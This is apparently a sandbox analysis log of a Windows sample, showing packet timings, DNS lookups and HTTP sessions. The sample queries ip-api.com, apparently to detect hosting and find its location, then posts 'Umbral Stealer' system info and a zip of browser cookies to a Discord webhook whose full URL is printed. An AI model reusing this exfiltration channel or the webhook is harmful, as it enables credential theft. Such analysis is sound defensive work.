                                            Aug 5, 2024 14:58:57.345944881 CEST49707443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:57.345957041 CEST44349707162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:57.811517000 CEST44349707162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:57.811708927 CEST49707443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:57.814182043 CEST49707443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:57.814187050 CEST44349707162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:57.814506054 CEST44349707162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:57.822582960 CEST49707443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:57.822725058 CEST4970080192.168.2.7208.95.112.1
                                            Aug 5, 2024 14:58:57.830672026 CEST8049700208.95.112.1192.168.2.7
                                            Aug 5, 2024 14:58:57.830733061 CEST4970080192.168.2.7208.95.112.1
                                            Aug 5, 2024 14:58:57.868499041 CEST44349707162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:57.936718941 CEST44349707162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:57.940262079 CEST49707443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:57.940268993 CEST44349707162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.214941978 CEST44349707162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.215061903 CEST44349707162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.215276957 CEST49707443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.216696978 CEST49707443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.217737913 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.217757940 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.217830896 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.218101025 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.218115091 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.695410013 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.696702957 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.696717978 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.815581083 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.815953016 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.815970898 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816015959 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816020012 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816082001 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816095114 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816198111 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816209078 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816220999 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816230059 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816348076 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816361904 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816400051 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816412926 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816454887 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816466093 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816517115 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816523075 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816543102 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816553116 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816602945 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816616058 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816652060 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816663027 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816709995 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816720963 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816759109 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816771030 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816816092 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816821098 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816837072 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816848040 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816904068 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816915035 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.816947937 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.816965103 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.817011118 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.817017078 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.817027092 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.817034006 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.817045927 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.817050934 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.817126036 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.817137957 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.817182064 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.817240000 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.817272902 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.817333937 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.817388058 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.826386929 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.826522112 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.826534033 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.826580048 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.826591969 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.826657057 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.826668978 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.826709986 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.826766014 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.826814890 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.826859951 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.826905012 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.832298994 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.832423925 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.832433939 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.832453012 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.832462072 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.832541943 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.832560062 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.832576036 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.832587004 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.832644939 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.832659960 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.832695961 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.832706928 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.832763910 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.832844973 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.832855940 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.836548090 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:58.836611986 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:58.838390112 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:59.632831097 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:59.632982016 CEST44349708162.159.138.232192.168.2.7
                                            Aug 5, 2024 14:58:59.633037090 CEST49708443192.168.2.7162.159.138.232
                                            Aug 5, 2024 14:58:59.633621931 CEST49708443192.168.2.7162.159.138.232

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 5, 2024 14:58:03.719536066 CEST5034953192.168.2.71.1.1.1
                                            Aug 5, 2024 14:58:03.733005047 CEST53503491.1.1.1192.168.2.7
                                            Aug 5, 2024 14:58:37.710249901 CEST6240053192.168.2.71.1.1.1
                                            Aug 5, 2024 14:58:37.717634916 CEST53624001.1.1.1192.168.2.7
                                            Aug 5, 2024 14:58:57.337081909 CEST6008353192.168.2.71.1.1.1
                                            Aug 5, 2024 14:58:57.344789982 CEST53600831.1.1.1192.168.2.7

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Aug 5, 2024 14:58:03.719536066 CEST192.168.2.71.1.1.10x6f7eStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                            Aug 5, 2024 14:58:37.710249901 CEST192.168.2.71.1.1.10xfabbStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                            Aug 5, 2024 14:58:57.337081909 CEST192.168.2.71.1.1.10xf6fbStandard query (0)ptb.discord.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Aug 5, 2024 14:58:03.733005047 CEST1.1.1.1192.168.2.70x6f7eNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                            Aug 5, 2024 14:58:37.717634916 CEST1.1.1.1192.168.2.70xfabbNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                            Aug 5, 2024 14:58:57.344789982 CEST1.1.1.1192.168.2.70xf6fbNo error (0)ptb.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                            Aug 5, 2024 14:58:57.344789982 CEST1.1.1.1192.168.2.70xf6fbNo error (0)ptb.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                            Aug 5, 2024 14:58:57.344789982 CEST1.1.1.1192.168.2.70xf6fbNo error (0)ptb.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                            Aug 5, 2024 14:58:57.344789982 CEST1.1.1.1192.168.2.70xf6fbNo error (0)ptb.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                            Aug 5, 2024 14:58:57.344789982 CEST1.1.1.1192.168.2.70xf6fbNo error (0)ptb.discord.com162.159.137.232A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • ptb.discord.com
                                            • ip-api.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.749700208.95.112.1805076C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            TimestampBytes transferredDirectionData
                                            Aug 5, 2024 14:58:03.744220972 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
                                            Aug 5, 2024 14:58:04.258070946 CEST175INHTTP/1.1 200 OK
                                            Date: Mon, 05 Aug 2024 12:58:03 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Content-Length: 6
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 60
                                            X-Rl: 44
                                            Data Raw: 66 61 6c 73 65 0a
                                            Data Ascii: false


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.749705208.95.112.1805076C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            TimestampBytes transferredDirectionData
                                            Aug 5, 2024 14:58:37.723392963 CEST55OUTGET /json/?fields=225545 HTTP/1.1
                                            Host: ip-api.com
                                            Aug 5, 2024 14:58:38.275398016 CEST379INHTTP/1.1 200 OK
                                            Date: Mon, 05 Aug 2024 12:58:37 GMT
                                            Content-Type: application/json; charset=utf-8
                                            Content-Length: 202
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 26
                                            X-Rl: 43
                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.749707162.159.138.2324435076C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-05 12:58:57 UTC364OUTPOST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1
                                            Accept: application/json
                                            User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                            Content-Type: application/json; charset=utf-8
                                            Host: ptb.discord.com
                                            Content-Length: 939
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            2024-08-05 12:58:57 UTC25INHTTP/1.1 100 Continue
                                            2024-08-05 12:58:57 UTC939OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 38 35 35 32 37 31 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 5c 72 5c 6e 43 50 55 3a 20 49 6e
                                            Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 855271\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 19882742-CC56-1A59-9779-FB8CBFA1E29D\r\nCPU: In
                                            2024-08-05 12:58:58 UTC1369INHTTP/1.1 204 No Content
                                            Date: Mon, 05 Aug 2024 12:58:58 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Connection: close
                                            set-cookie: __dcfduid=7a814ee2532a11efa09d826be3208cc7; Expires=Sat, 04-Aug-2029 12:58:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1722862739
                                            x-ratelimit-reset-after: 1
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WtzklgeSXQGoxuB0NGRMHlbkqXVKxjuYzDE7Q%2BGoGTvX%2FEWCPUOrqR4n27jcmPprci63nBuhFWNhullO2T0dGo3r3jIzD1gw%2FJHuJAwjf7D2kmkVyB4Ry64VURZ6S7bLww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Set-Cookie: __sdcfduid=7a814ee2532a11efa09d826be3208cc7956c19817d1b7d5a1a392a7a120d7cbd49d98e0181b32a1cbbb9f1bd86d273af; Expires=Sat, 04-Aug-2029 12:58:58 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                            Set-Cookie: __cfruid=be4db5686074cbc337a6b7e38b8f014842b640ea-1722862738; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Set
                                            2024-08-05 12:58:58 UTC208INData Raw: 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 34 36 77 78 5a 44 4b 6a 51 46 7a 38 4b 50 49 79 58 52 68 77 76 41 77 57 43 70 79 42 46 4b 61 41 2e 69 44 63 56 32 48 6d 73 70 4d 2d 31 37 32 32 38 36 32 37 33 38 30 39 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 61 65 36 66 36 32 66 63 66 31 35 30 63 61 63 2d 45 57 52 0d 0a 0d 0a
                                            Data Ascii: -Cookie: _cfuvid=46wxZDKjQFz8KPIyXRhwvAwWCpyBFKaA.iDcV2HmspM-1722862738091-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ae6f62fcf150cac-EWR


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.749708162.159.138.2324435076C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            TimestampBytes transferredDirectionData
                                            2024-08-05 12:58:58 UTC688OUTPOST /api/webhooks/1193833046810566716/Ip5p47J2qEw7d2YvXLGh3HLrizvUKpbZJnMXQxzQS4N9EYMFmhbB3hhBZhMwKm0ApaPL HTTP/1.1
                                            Accept: application/json
                                            User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                            Content-Type: multipart/form-data; boundary="2c5bd49c-1052-4010-b4fa-7aeaeb7ffcb0"
                                            Host: ptb.discord.com
                                            Cookie: __dcfduid=7a814ee2532a11efa09d826be3208cc7; __sdcfduid=7a814ee2532a11efa09d826be3208cc7956c19817d1b7d5a1a392a7a120d7cbd49d98e0181b32a1cbbb9f1bd86d273af; __cfruid=be4db5686074cbc337a6b7e38b8f014842b640ea-1722862738; _cfuvid=46wxZDKjQFz8KPIyXRhwvAwWCpyBFKaA.iDcV2HmspM-1722862738091-0.0.1.1-604800000
                                            Content-Length: 656125
                                            Expect: 100-continue
                                            2024-08-05 12:58:58 UTC25INHTTP/1.1 100 Continue
                                            2024-08-05 12:58:58 UTC40OUTData Raw: 2d 2d 32 63 35 62 64 34 39 63 2d 31 30 35 32 2d 34 30 31 30 2d 62 34 66 61 2d 37 61 65 61 65 62 37 66 66 63 62 30 0d 0a
                                            Data Ascii: --2c5bd49c-1052-4010-b4fa-7aeaeb7ffcb0
                                            2024-08-05 12:58:58 UTC140OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 38 35 35 32 37 31 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 38 35 35 32 37 31 2e 7a 69 70 0d 0a 0d 0a
                                            Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-855271.zip; filename*=utf-8''Umbral-855271.zip
                                            2024-08-05 12:58:58 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 6c 53 05 59 9c 5c 22 6e ed 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 4b 72 82 30 00 00 d0 75 9c f1 28 d0 84 90 44 16 5d 50 84 0a 11 44 8a 50 dc 38 54 fe 83 f2 17 e5 f4 ed 09 fa 0e f0 c4 bc 69 f2 3a 15 af cd 0d f8 de 49 07 6f c0 50 f7 5f 3a 40 18 cb 98 10 86 65 a4 30 2a 6f 14 80 dc 8b a5 7a 40 82 12 16 10 14 20 11 20 5b af c4 7f 02 42 19 a3 44 86 7f 01 c1 18 38 e6 16 10 84 de ef 4e 9c 74 a1 32 f9 d7 08 1e 5c 6a e2 38 bb f7 0c 35 54 5f e2 68 3f 24 6d 28 9f f4 c8 c1 8f a8 bb f4 3f 5e ef 18 4f 1b 55 cd e2 7e 4e 45 75 f0 3e ce 9c db 8b 34 26 db 36 48 59 e2 4c 7e d8 ca da 8b 0b cb 48 cc 81 ce 81 5e 3f d2 50 cd f8 31 9f 1d ab e4 7c
                                            Data Ascii: PKlSY\"n!#Browsers\Cookies\Chrome Cookies.txt}Kr0u(D]PDP8Ti:IoP_:@e0*oz@ [BD8Nt2\j85T_h?$m(?^OU~NEu>4&6HYL~H^?P1|
                                            2024-08-05 12:58:58 UTC16355OUTData Raw: 50 d7 9b 3c 8b ae 02 23 0a 39 8a 42 c6 0d 49 51 dd 2c 31 1c 1e 37 d1 58 de e5 bf d5 f0 e1 55 70 f6 52 0b 3f de 32 d0 04 21 8a eb b8 dc 09 37 6c cd 30 9c 8f c7 fa 73 7a 1e 53 5e 17 d9 d0 7e ea 97 f0 14 c7 7d f3 e5 96 2f e7 49 18 98 d3 cb b6 c9 86 39 ae dd 1f e0 0d 39 9d db ea e4 11 ae 64 7f 5d 81 4a 99 08 19 fd a9 18 db 9b d8 da 1f 6d 44 fb 78 e0 fb d7 69 7d bd a7 b3 fe fb 67 2d 03 5c cb bd 9e 11 ca 37 8b bf 08 08 86 1c 8c 23 52 70 4f 45 31 d2 cc 75 d4 d4 0a 55 02 66 f1 f0 b4 3e e3 97 ac 20 9d e9 06 d1 16 b7 f2 a1 9d 0c bc 9d ed 9e 03 3f 12 da e0 72 cd 89 74 68 cd 35 8d 5f 71 bd 23 33 cc 0d 87 d9 27 fb 9c 2d 57 6a e6 d6 31 d1 69 3b 19 29 c3 3d a2 02 2a f4 6b 8c 8e 23 c2 19 b8 dd e2 cc 27 33 c6 f0 92 04 dc b7 a2 c9 6d 0e 54 b1 4d ec 75 15 a1 99 a3 88 68 af
                                            Data Ascii: P<#9BIQ,17XUpR?2!7l0szS^~}/I99d]JmDxi}g-\7#RpOE1uUf> ?rth5_q#3'-Wj1i;)=*k#'3mTMuh
                                            2024-08-05 12:58:58 UTC16355OUTData Raw: 05 f7 64 46 a7 58 cc 2b ed 22 73 d0 65 25 52 c1 59 b8 a7 98 01 83 87 69 c7 c4 93 f2 17 eb 3f bc d1 2e b2 fb 9d 9f 31 f8 4e e0 a9 1a 4b ed 9b da 2c e6 ee 8e 6e 99 d5 41 db 3d a9 39 25 52 e1 d0 a8 b7 32 b1 b3 86 77 8e 42 bc 51 34 97 50 7a 97 67 b1 17 33 29 b9 b6 57 5e 9d 96 35 e8 ba b0 61 ac 9b 05 b2 91 26 17 af 5a 1d 13 bb 61 9d 95 46 f8 a7 48 b6 c8 85 ae 9b 36 cf 97 16 51 f8 8d 45 7c 6f f1 25 1c a2 b8 8a c6 44 aa 82 cc 70 b1 c6 4b cb e7 8f 7a 67 a2 5c bd 56 b0 48 26 28 80 74 1f 3e 49 34 f0 b8 75 6d 2b b4 c8 b6 41 4d fa 1e 7c 03 f6 1b b2 7d f0 49 ef 53 43 37 3c 73 bb e2 8a 55 49 1a bb d7 75 ba 0d 21 84 5c f0 de 50 ee 92 85 2d 00 66 02 cd aa 40 ac 1d e0 a8 c9 25 15 0b fb 1f 9e 7b 59 63 b3 59 30 32 97 62 c1 06 0d 12 3e 96 34 a8 53 fb 25 da 0e 57 47 03 57 27
                                            Data Ascii: dFX+"se%RYi?.1NK,nA=9%R2wBQ4Pzg3)W^5a&ZaFH6QE|o%DpKzg\VH&(t>I4um+AM|}ISC7<sUIu!\P-f@%{YcY02b>4S%WGW'
                                            2024-08-05 12:58:58 UTC16355OUTData Raw: 00 12 9c 99 7b 67 49 18 22 b9 f8 a0 f8 62 6e 91 21 a7 bb fe 10 f6 b6 49 7a df ec 5f ba 6a fc 88 d5 a1 ac 5b b3 65 90 4a bb a9 e3 88 2f 5f 9b 1d 70 88 77 d0 b5 2a 80 16 75 14 f4 1a 75 7b 46 9e 93 2f cf ea a6 b8 cf b3 6a 04 59 91 a3 6f 57 41 a1 3d 65 06 06 3d 66 78 23 6d 6e fa dd 4c 34 99 88 00 76 c3 bb 94 0c 4c 60 8e ac 93 23 ee fe c1 13 ae 03 e7 c3 bb 30 73 45 58 21 fb fd a0 4f fc 0d 66 f5 e9 cb ae e8 45 3f 77 c4 27 ac 8b ff 3d ae 23 92 43 7c d4 b0 db bc ef b5 f5 43 e5 32 19 8d 43 a2 0f 00 d1 13 93 5b 84 41 9d 5b 6e 98 ac 2f 8a c1 9f 0d 62 33 68 6a 7d 16 c0 72 fc 8c dd 5a 2c 66 71 df b2 06 c0 e8 e0 a5 aa b5 45 0d c2 b3 08 ad e0 81 d6 c7 1c 7b c2 ef fb 2a 89 1e 79 28 0e bf a2 82 5f b3 87 b1 24 3c 80 ab 6a 00 46 6a e0 c0 0e da 1a fc 2e 53 ab 9c 1d cb ce ad
                                            Data Ascii: {gI"bn!Iz_j[eJ/_pw*uu{F/jYoWA=e=fx#mnL4vL`#0sEX!OfE?w'=#C|C2C[A[n/b3hj}rZ,fqE{*y(_$<jFj.S
